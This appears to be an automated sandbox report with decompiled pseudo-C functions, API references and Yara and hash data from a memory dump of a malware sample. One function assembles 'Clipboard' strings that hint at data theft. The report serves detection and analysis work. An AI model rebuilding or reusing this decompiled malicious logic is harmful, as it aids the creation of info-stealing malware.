              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
              • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
              • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
              • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00408EC0 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E00408EC0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407210(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407420( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BF30( &_v284, 0x104);
						E0041C5A0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_push( &_v284);
							_push(E004159D0(_t52, _t50));
							_t31 = E00415A30();
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x18; // 0x5e14c483
						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407450( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004074D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
					_t20 = _t52 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















              0x00408ecb
              0x00408ed3
              0x00408ed5
              0x00408eda
              0x00408edf
              0x00408ef2
              0x00408ef7
              0x00408f00
              0x00408f0c
              0x00408f1f
              0x00408f24
              0x00408f27
              0x00408f30
              0x00408f36
              0x00408f41
              0x00408f42
              0x00408f47
              0x00408f4c
              0x00000000
              0x00000000
              0x00408f4e
              0x00408f52
              0x00000000
              0x00000000
              0x00408f54
              0x00000000
              0x00408f52
              0x00408f56
              0x00408f59
              0x00408f5f
              0x00408f61
              0x00408f6c
              0x00408f71
              0x00408f74
              0x00408f81
              0x00408f8c
              0x00408f8e
              0x00408f94
              0x00408f98
              0x00408f9b
              0x00408f9b
              0x00408fa2
              0x00408fa5
              0x00408faa
              0x00408fb7
              0x00408ee6
              0x00408ee6
              0x00408ee6

              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 93f760812399f8b802e89b1baefd5a0ad2d7afa31538cab3fdcf1f6430cb223a
              • Instruction ID: e1e303cda2bc467be42d69ec047be5a8586c693d5030c6259e94ade7c470e7be
              • Opcode Fuzzy Hash: 93f760812399f8b802e89b1baefd5a0ad2d7afa31538cab3fdcf1f6430cb223a
              • Instruction Fuzzy Hash: 45213CB2C4020957CB20D6709D41AFB73ACAF54314F44057FF989A3181FA38BB4587A6
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A5E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 8 41a5e0-41a611 call 41af60 RtlAllocateHeap
              C-Code - Quality: 53%
              			E0041A5E0(intOrPtr _a4, void* _a16) {
				void* _v3;
				long _t6;
				void* _t7;
				void* _t8;
				long _t12;

				_t5 = _a4;
				_t8 =  *(_a4 + 0x14);
				_t6 = E0041AF60(_t8, _t5, _t5 + 0xc8c, _t8, 0, 0x34);
				asm("adc al, 0x8b");
				asm("adc [ebx-0x3b7cf3b3], cl");
				asm("adc al, 0x52");
				_t7 = RtlAllocateHeap(_t8, _t6, _t12); // executed
				return _t7;
			}








              0x0041a5e3
              0x0041a5e6
              0x0041a5f7
              0x0041a5fe
              0x0041a601
              0x0041a607
              0x0041a60d
              0x0041a611

              APIs
              • RtlAllocateHeap.NTDLL(vQA,?,XA,004158EF,?,00415176,?,?,?,?,?,00000000,00409103,?), ref: 0041A60D
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: vQA$XA
              • API String ID: 1279760036-3554124191
              • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
              • Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
              • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
              • Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A612 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 15 41a612-41a613 16 41a615-41a617 15->16 17 41a5fd-41a611 RtlAllocateHeap 15->17 18 41a689-41a68c 16->18 19 41a619-41a61b 16->19 19->18
              C-Code - Quality: 50%
              			E0041A612(void* __eax, void* __eflags, void* _a1, char _a4, void* _a8, long _a12, void* _a16) {
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t11;
				long _t15;
				long _t18;

				_t9 = _t18;
				if(__eflags > 0) {
					asm("adc al, 0x8b");
					asm("adc [ebx-0x3b7cf3b3], cl");
					asm("adc al, 0x52");
					_t10 = RtlAllocateHeap(_t11, _t9, _t15); // executed
					return _t10;
				} else {
					_push(ds);
					if(__eflags >= 0) {
						asm("rcr byte [esi+0x5d], 1"); // executed
						_pop(__esi);
						_pop(__ebp);
						return __eax;
					} else {
						asm("cdq");
						asm("out dx, eax");
						__ebp = __esp;
						asm("in al, dx");
						__eax = _a4;
						_t4 = __eax + 0xc90; // 0xc90
						__esi = _t4;
						__eax = _a12;
						__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
						__esi = __esi;
						__ebp = __ebp;
						return __eax;
					}
				}
			}










              0x0041a612
              0x0041a613
              0x0041a5fe
              0x0041a601
              0x0041a607
              0x0041a60d
              0x0041a611
              0x0041a615
              0x0041a615
              0x0041a617
              0x0041a689
              0x0041a68a
              0x0041a68b
              0x0041a68c
              0x0041a619
              0x0041a619
              0x0041a61a
              0x0041a621
              0x0041a622
              0x0041a623
              0x0041a62f
              0x0041a62f
              0x0041a63f
              0x0041a64d
              0x0041a64f
              0x0041a650
              0x0041a651
              0x0041a651
              0x0041a617

              APIs
              • RtlAllocateHeap.NTDLL(vQA,?,XA,004158EF,?,00415176,?,?,?,?,?,00000000,00409103,?), ref: 0041A60D
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: AllocateHeap
              • String ID: vQA
              • API String ID: 1279760036-222744803
              • Opcode ID: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
              • Instruction ID: e5e3093a980432026f87045ee9294afd0da951fb93029d0fb8ee1138940f66d1
              • Opcode Fuzzy Hash: 25390f91c17b98b234e1ab0be807ce0d70dbf3980185bf3fbe2545db36cdc728
              • Instruction Fuzzy Hash: F8D0957F0092522AF712F3A05D808F3370DE5C625C32C4C87D4C94B049C415408943A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A7F1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 215 41a7f1-41a7f6 216 41a7b6-41a7d9 215->216 217 41a7f8 215->217 218 41a7df-41a7f0 216->218 219 41a7da call 41af60 216->219 220 41a7fa-41a814 217->220 221 41a79c-41a7b4 LookupPrivilegeValueW 217->221 219->218 222 41a81a-41a827 220->222 223 41a815 call 41b030 220->223 223->222
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 04996b27cc3a8e28686fee7ffa7528340dfc9e4ad8ad515d80635477a9edbc4e
              • Instruction ID: d801fb6e8e135d1f7297e75111a5b6a1c80427030879cfd859f3471cb81f6c57
              • Opcode Fuzzy Hash: 04996b27cc3a8e28686fee7ffa7528340dfc9e4ad8ad515d80635477a9edbc4e
              • Instruction Fuzzy Hash: FA11E3B5200204AFCB14EFA8CC85EE77B68DF48360F04814AF91D97342C234E910C7A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A772 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 226 41a772-41a777 227 41a704-41a709 226->227 228 41a779-41a77f 226->228 229 41a70f-41a724 227->229 230 41a70a call 41af60 227->230 231 41a781-41a79a call 41af60 228->231 232 41a7d6-41a7f0 call 41af60 228->232 230->229 236 41a79f-41a7b4 LookupPrivilegeValueW 231->236
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: bb97520cd0521ec4fdbbdc8def6d758f712b5e6667911d8f6daa84a07f1d742b
              • Instruction ID: 9c28b7cc7472d034cae90b7970fce93ca26411468d97baa0e424f7f395dba4d2
              • Opcode Fuzzy Hash: bb97520cd0521ec4fdbbdc8def6d758f712b5e6667911d8f6daa84a07f1d742b
              • Instruction Fuzzy Hash: BE01ADB52012086FCB10EFA9DC45DE737A9EF88328F14855AFD4D87242D535E921CBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407678 Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 240 407678-4076ca call 41bf80 call 41cb60 call 40a130 call 415a90 249 4076cc-4076de PostThreadMessageW 240->249 250 4076fe-407702 240->250 251 4076e0-4076fa call 409890 249->251 252 4076fd 249->252 251->252 252->250
              C-Code - Quality: 65%
              			E00407678(void* __eax, intOrPtr* __ecx, void* __edx, long _a8) {
				char _v63;
				char _v64;
				void* _t14;
				int _t15;
				long _t24;
				int _t29;
				void* _t32;
				void* _t34;
				intOrPtr _t39;

				asm("cli");
				 *__ecx =  *__ecx + __edx;
				_t39 =  *__ecx;
				_pop(es);
				_push(0x83ec8b55);
				_t32 = _t34;
				_t1 =  &_v63; // 0x83ec8b16
				_v64 = 0;
				E0041BF80(_t1, 0, 0x3f);
				_t3 =  &_v64; // 0x83ec8b15
				E0041CB60(_t3, 3);
				_t5 =  &_v64; // 0x83ec8b15
				_t14 = E0040A130(_t39, _a8 + 0x20, _t5); // executed
				_t15 = E00415A90(_a8 + 0x20, _t14, 0, 0, 0xc4e7b6d6);
				_t29 = _t15;
				if(_t29 != 0) {
					_t24 = _a8;
					_t15 = PostThreadMessageW(_t24, 0x111, 0, 0); // executed
					_t41 = _t15;
					if(_t15 == 0) {
						_t8 = (E00409890(_t41, 1, 8) & 0x000000ff) - 0x40; // 0x83ec8b15
						_t15 =  *_t29(_t24, 0x8003, _t32 + _t8, _t15);
					}
				}
				return _t15;
			}












              0x0040767a
              0x0040767b
              0x0040767b
              0x0040767d
              0x00407680
              0x00407681
              0x00407689
              0x0040768f
              0x00407693
              0x00407698
              0x0040769e
              0x004076a6
              0x004076ae
              0x004076be
              0x004076c3
              0x004076ca
              0x004076cd
              0x004076da
              0x004076dc
              0x004076de
              0x004076f0
              0x004076fb
              0x004076fb
              0x004076fd
              0x00407702

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 1d24450bd017678ce66bab97c7d6d8ebfdde9aab029e39b938909c969a5b9744
              • Instruction ID: e382de2d488913a4c38b773f9f4ea01094326f9544b34bd5420c5db10e548f36
              • Opcode Fuzzy Hash: 1d24450bd017678ce66bab97c7d6d8ebfdde9aab029e39b938909c969a5b9744
              • Instruction Fuzzy Hash: 40012832A802297AE721A6919C43FFE775C9F05F55F04052AFB04FA1C1D6A9390647E9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407680 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 255 407680-40768f 256 407698-4076ca call 41cb60 call 40a130 call 415a90 255->256 257 407693 call 41bf80 255->257 264 4076cc-4076de PostThreadMessageW 256->264 265 4076fe-407702 256->265 257->256 266 4076e0-4076fa call 409890 264->266 267 4076fd 264->267 266->267 267->265
              C-Code - Quality: 82%
              			E00407680(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_t1 =  &_v67; // 0x83ec8b16
				_v68 = 0;
				E0041BF80(_t1, 0, 0x3f);
				_t3 =  &_v68; // 0x83ec8b15
				E0041CB60(_t3, 3);
				_t5 =  &_v68; // 0x83ec8b15
				_t12 = E0040A130(_t30, _a4 + 0x20, _t5); // executed
				_t13 = E00415A90(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t8 = (E00409890(_t32, 1, 8) & 0x000000ff) - 0x40; // 0x83ec8b15
						_t14 =  *_t25(_t21, 0x8003, _t26 + _t8, _t14);
					}
					return _t14;
				}
				return _t13;
			}












              0x00407680
              0x00407689
              0x0040768f
              0x00407693
              0x00407698
              0x0040769e
              0x004076a6
              0x004076ae
              0x004076be
              0x004076c3
              0x004076ca
              0x004076cd
              0x004076da
              0x004076dc
              0x004076de
              0x004076f0
              0x004076fb
              0x004076fb
              0x00000000
              0x004076fd
              0x00407702

              APIs
              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: b252e7fb5a3fa841a4463d49c9e96754b684922344a3da95cd15ab6fad1711e5
              • Instruction ID: 278e8058fb31caf7c2e07854df6c2d6cb8d26bb135801241625d4459e23f34b3
              • Opcode Fuzzy Hash: b252e7fb5a3fa841a4463d49c9e96754b684922344a3da95cd15ab6fad1711e5
              • Instruction Fuzzy Hash: 6401D431A8022876E720A6959C43FFE776C9B04B54F04012AFB04BA1C1EAA8790646EE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				asm("in al, dx");
				_t7 = _a4;
				_t3 = _t7 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




              0x0041a622
              0x0041a623
              0x0041a62f
              0x0041a637
              0x0041a64d
              0x0041a651

              APIs
              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
              • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
              • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
              • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
              • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
              • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
              • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A622 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 79%
              			E0041A622() {
				char _t10;
				void* _t18;

				asm("in al, dx");
				_t7 =  *((intOrPtr*)(_t18 + 8));
				_t3 = _t7 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), _t7, _t3,  *((intOrPtr*)( *((intOrPtr*)(_t18 + 8)) + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap( *(_t18 + 0xc),  *(_t18 + 0x10),  *(_t18 + 0x14)); // executed
				return _t10;
			}





              0x0041a622
              0x0041a623
              0x0041a62f
              0x0041a637
              0x0041a64d
              0x0041a651

              APIs
              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID:
              • API String ID: 3298025750-0
              • Opcode ID: 42c06c799e4df52455392ddeb8f0d161d1629164c4721ba82391d5d6f37b3dae
              • Instruction ID: 9b0d6052ef7d2a57c5749feae5536bac713de6889547fe143f190e0c4f2b478e
              • Opcode Fuzzy Hash: 42c06c799e4df52455392ddeb8f0d161d1629164c4721ba82391d5d6f37b3dae
              • Instruction Fuzzy Hash: FDE046B1200204AFDB14DF59DC48EE73B68EF88364F118159F90C9B241C630E921CAB0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A654 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
              Download Yara Rule
              C-Code - Quality: 54%
              			E0041A654(void* __eax, signed int __ebx, void* __ecx, void* __edx, int _a4) {
				intOrPtr _v0;
				intOrPtr _t10;
				intOrPtr* _t19;

				_push(0xffffffd9);
				asm("lodsb");
				 *0xe20defeb =  *0xe20defeb ^ __ebx;
				asm("les edx, [ebp-0x75]");
				_t8 = _v0;
				_t19 = _v0 + 0xc98;
				E0041AF60( *((intOrPtr*)(_t8 + 0xa18)), _t8, _t19,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x36);
				_t10 =  *_t19;
				ExitProcess(_a4);
				asm("rcr byte [esi+0x5d], 1"); // executed
				return _t10;
			}






              0x0041a654
              0x0041a657
              0x0041a659
              0x0041a65f
              0x0041a663
              0x0041a672
              0x0041a67a
              0x0041a682
              0x0041a688
              0x0041a689
              0x0041a68c

              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: ed9718ef2cbb54db8ab7e332bc441fe251272e78161c55fbd11ed651f822c4db
              • Instruction ID: dee541f4d3dd545f110619b51694c466bdef55d7f7e62b80beb5638e05ceca3b
              • Opcode Fuzzy Hash: ed9718ef2cbb54db8ab7e332bc441fe251272e78161c55fbd11ed651f822c4db
              • Instruction Fuzzy Hash: 44E04F716411146BC724DF69CC85ECB3B68EF457A0F14C668B919AF282C530AA06C7D1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E0041A660(intOrPtr _a4, int _a8) {
				intOrPtr _t7;
				intOrPtr* _t10;

				_t5 = _a4;
				_t10 = _a4 + 0xc98;
				E0041AF60( *((intOrPtr*)(_t5 + 0xa18)), _t5, _t10,  *((intOrPtr*)(_t5 + 0xa18)), 0, 0x36);
				_t7 =  *_t10;
				ExitProcess(_a8);
				asm("rcr byte [esi+0x5d], 1"); // executed
				return _t7;
			}





              0x0041a663
              0x0041a672
              0x0041a67a
              0x0041a682
              0x0041a688
              0x0041a689
              0x00000000

              APIs
              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
              Memory Dump Source
              • Source File: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_ronkhfyq.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcess
              • String ID:
              • API String ID: 621844428-0
              • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
              • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
              • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
              • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00406EA4 Relevance: 6.4, Strings: 5, Instructions: 112COMMON
              Download Yara Rule
              C-Code - Quality: 24%
              			E00406EA4(intOrPtr* __eax, void* __ecx, void* __edx, void* __eflags) {
				short _t40;
				void* _t61;
				void* _t83;
				void* _t86;
				void* _t87;
				void* _t90;
				void* _t91;
				void* _t93;

				asm("invalid");
				asm("rcl dword [ebp+ebp*4+0x210aaff4], cl");
				asm("int 0x42");
				asm("int3");
				if(__eflags <= 0) {
					_t87 = _t86 + 1;
					 *__eax =  *__eax + __eax;
					_t5 = _t61 + 0x57;
					 *_t5 =  *((intOrPtr*)(_t61 + 0x57)) + __edx;
					__eflags =  *_t5;
					_push(_t61);
					_t79 = __eax + __eax;
					_t62 = __ecx + 0x1ff570;
					_t40 = E0041C210( *((intOrPtr*)(_t87 + 0xc)), __ecx + 0x1ff570, __eax + __eax);
					_t91 = _t90 + 0xc;
					__eflags = _t40;
					if(_t40 == 0) {
						E0041BF00(_t62,  *((intOrPtr*)(_t87 + 0xc)), _t79);
						_t93 = _t91 + 0xc;
						 *((short*)(_t87 - 4)) = 0;
						_t64 = _t83 + 0x447c;
						 *((intOrPtr*)(_t87 - 0xc)) = 0xa000d;
						 *((intOrPtr*)(_t87 - 8)) = 0xa000d;
						 *((intOrPtr*)(_t87 - 0x3c)) = 0x6c0043;
						 *((intOrPtr*)(_t87 - 0x38)) = 0x700069;
						 *((intOrPtr*)(_t87 - 0x34)) = 0x6f0062;
						 *((intOrPtr*)(_t87 - 0x30)) = 0x720061;
						 *((intOrPtr*)(_t87 - 0x2c)) = 0x64;
						 *((short*)(_t87 - 0x28)) = 0;
						 *((intOrPtr*)(_t87 - 0x26)) = 0;
						 *((intOrPtr*)(_t87 - 0x22)) = 0;
						 *((short*)(_t87 - 0x1e)) = 0;
						 *((intOrPtr*)( *((intOrPtr*)(_t83 + 0xcdc))))(_t83 + 0x447c, 0x104);
						 *((intOrPtr*)( *((intOrPtr*)(_t83 + 0xcd8))))(0);
						__eflags = 0 - 0x40;
						if(0 <= 0x40) {
							__eflags = 0;
							if(0 == 0) {
								 *((intOrPtr*)(_t87 - 0x1c)) = 0x6e0055;
								 *((intOrPtr*)(_t87 - 0x18)) = 0x6e006b;
								 *((intOrPtr*)(_t87 - 0x14)) = 0x77006f;
								 *((intOrPtr*)(_t87 - 0x10)) = 0x6e;
								E0041BF00(_t64, _t87 - 0x1c, 0x10);
								_t93 = _t93 + 0xc;
							}
						} else {
							 *((short*)(_t83 + 0x44fc)) = 0;
						}
						_t81 = _t83 + 0x4cfc;
						E0041BF00(_t83 + 0x4cfc, _t87 - 0x3c, 0x14);
						E0041C360(_t81, _t87 - 0xc, 0);
						E0041C360(_t81, _t64, 0);
						E0041C360(_t81, _t87 - 0xc, 0);
						E0041C360(_t81,  *((intOrPtr*)(_t87 + 0xc)), 0);
						 *((intOrPtr*)(_t83 + 0xa0c)) = E0041C1F0(_t81) + _t51;
						_t54 = E0041C1F0(_t81) + _t53;
						__eflags = E0041C1F0(_t81) + _t53;
						E0041BF00( *((intOrPtr*)(_t83 + 0xa08)), _t81, _t54);
						_t40 = E0040D400(_t83, 0x13);
					}
					return _t40;
				} else {
					asm("pushfd");
					return 1;
				}
			}











              0x00406ea4
              0x00406ea6
              0x00406ead
              0x00406eaf
              0x00406eb0
              0x00406efb
              0x00406efc
              0x00406efe
              0x00406efe
              0x00406efe
              0x00406eff
              0x00406f01
              0x00406f04
              0x00406f10
              0x00406f15
              0x00406f18
              0x00406f1a
              0x00406f26
              0x00406f2b
              0x00406f37
              0x00406f41
              0x00406f48
              0x00406f4f
              0x00406f56
              0x00406f5d
              0x00406f64
              0x00406f6b
              0x00406f72
              0x00406f79
              0x00406f7d
              0x00406f80
              0x00406f83
              0x00406f87
              0x00406f90
              0x00406f92
              0x00406f95
              0x00406fa2
              0x00406fa4
              0x00406fad
              0x00406fb4
              0x00406fbb
              0x00406fc2
              0x00406fc9
              0x00406fce
              0x00406fce
              0x00406f97
              0x00406f99
              0x00406f99
              0x00406fd7
              0x00406fde
              0x00406fea
              0x00406ff3
              0x00406fff
              0x0040700b
              0x0040701c
              0x0040702d
